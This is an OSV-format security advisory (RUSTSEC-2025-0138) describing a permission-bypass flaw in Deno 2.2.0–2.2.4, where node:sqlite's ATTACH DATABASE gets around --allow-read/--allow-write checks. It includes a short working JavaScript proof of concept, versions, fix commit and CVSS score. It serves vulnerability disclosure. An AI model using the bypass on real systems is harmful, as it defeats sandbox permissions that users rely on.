{"id":"RUSTSEC-2025-0138","summary":"--allow-read / --allow-write permission bypass in `node:sqlite`","details":"It is possible to bypass Deno's read/write permission\nchecks by using an ATTACH DATABASE statement.\n\n## PoC\n\n```\n// poc.js\nimport { DatabaseSync } from \"node:sqlite\"\n\nconst db = new DatabaseSync(\":memory:\");\ndb.exec(\"ATTACH DATABASE 'test.db' as test;\");\n\ndb.exec(\"CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);\");\n```\n\n```\n$ deno poc.js\n```","aliases":["CVE-2025-48935","GHSA-8vxj-4cph-c596"],"modified":"2025-12-29T10:25:55.204417Z","published":"2025-06-03T12:00:00Z","database_specific":{"license":"CC-BY-4.0"},"references":[{"type":"PACKAGE","url":"https://crates.io/crates/deno"},{"type":"ADVISORY","url":"https://rustsec.org/advisories/RUSTSEC-2025-0138.html"},{"type":"ADVISORY","url":"https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596"},{"type":"WEB","url":"https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860"}],"affected":[{"package":{"name":"deno","ecosystem":"crates.io","purl":"pkg:cargo/deno"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.2.0"},{"fixed":"2.2.5"}]}],"ecosystem_specific":{"affected_functions":null,"affects":{"arch":[],"functions":[],"os":[]}},"database_specific":{"cvss":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","source":"https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2025-0138.json","categories":[],"informational":null}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"}]}